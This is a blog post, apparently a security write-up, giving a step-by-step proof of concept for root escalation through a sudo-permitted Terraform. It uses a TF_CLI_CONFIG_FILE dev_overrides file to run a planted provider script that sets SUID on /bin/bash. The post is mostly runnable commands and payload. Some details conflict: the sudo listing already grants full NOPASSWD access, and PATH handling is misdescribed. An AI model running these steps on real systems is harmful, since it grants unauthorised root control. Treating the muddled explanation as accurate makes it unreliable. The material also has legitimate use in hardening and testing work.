Post

Privilege Escalation PoC: Terraform sudo Exploit

PoC showing Linux privilege escalation via sudo Terraform. By abusing provider_installation dev_overrides and TF_CLI_CONFIG_FILE, a malicious provider script runs as root, allowing creation of a SUID root shell.

Posted
Preview Image
By dollarboysushil
2 min read
Privilege Escalation PoC: Terraform sudo Exploit

Privilege Escalation PoC: Terraform sudo Exploit

This PoC demonstrates how a user with specific sudo privileges on a Linux machine can escalate to root using Terraform and a crafted provider script. This updated method simplifies the SUID shell creation.

Target User

1
2
3
4
5
6
7

sushil@example:/tmp$ sudo -l
Matching Defaults entries for sushil on example:
    !env_reset, env_delete+=PATH, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty

User sushil may run the following commands on example:
    (root) /usr/bin/terraform -chdir=/opt/examples apply
    (ALL) NOPASSWD: ALL

Key Observations

  • sushil can run Terraform as root only in /opt/examples.
  • Environment variables are not reset (!env_reset) and PATH can be modified (env_delete+=PATH).
  • TF_CLI_CONFIG_FILE can be pointed to a custom file to control provider installation paths.
  • This allows arbitrary code execution as root.

Exploit Steps

1. Identify Terraform Provider Name

The provider name used by Terraform can be identified by reading the .tf files in the /opt/examples directory:

1

cat /opt/examples/*.tf
  • In this case, the provider name is dollarboysushil.com.

2. Create a Malicious Terraform Provider Script

We create a script that sets the SUID bit on /bin/bash, allowing a root shell when executed.

1
2
3
4
5
6

cat > /tmp/terraform-provider-examples << 'EOF'
#!/bin/bash
chmod +s /bin/bash
EOF

chmod +x /tmp/terraform-provider-examples
  • /tmp/terraform-provider-examples is our custom provider script.
  • chmod +s /bin/bash sets the SUID bit so that /bin/bash -p preserves root privileges.

3. Create a Terraform Configuration Override

Terraform allows provider installation overrides. We exploit this to make Terraform execute our script instead of a legitimate provider.

1
2
3
4
5
6
7
8
9
10

cat > /tmp/dollarboysushil.rc << 'EOF'
provider_installation {
  dev_overrides {
    "dollarboysushil.com/terraform/examples" = "/tmp"
  }
  direct {}
}
EOF

export TF_CLI_CONFIG_FILE=/tmp/dollarboysushil.rc
  • TF_CLI_CONFIG_FILE points to our configuration file.
  • "dollarboysushil.com/terraform/examples" = "/tmp" tells Terraform to use /tmp as the provider path.
  • When Terraform runs, it executes files from /tmp as root.

4. Run Terraform as Root

1

sudo /usr/bin/terraform -chdir=/opt/examples apply
  • Terraform now executes /tmp/terraform-provider-examples, which sets the SUID bit on /bin/bash.

5. Get a Root Shell

1

/bin/bash -p
  • -p preserves the SUID privileges.
  • You now have a root shell.

Summary

This updated PoC demonstrates a Sudo + Terraform misconfiguration leading to privilege escalation:

  1. User can run Terraform as root in a specific directory.
  2. Terraform allows provider overrides via TF_CLI_CONFIG_FILE.
  3. Malicious provider executed by Terraform sets SUID on /bin/bash.
  4. The user can execute /bin/bash -p to gain root access.

RCE, cve, CVE-2024-47533
terraform linux cve previous privilege escalation
This post is licensed under CC BY 4.0 by the author.

© dollarboysushil. Some rights reserved.

Using the Chirpy theme for Jekyll.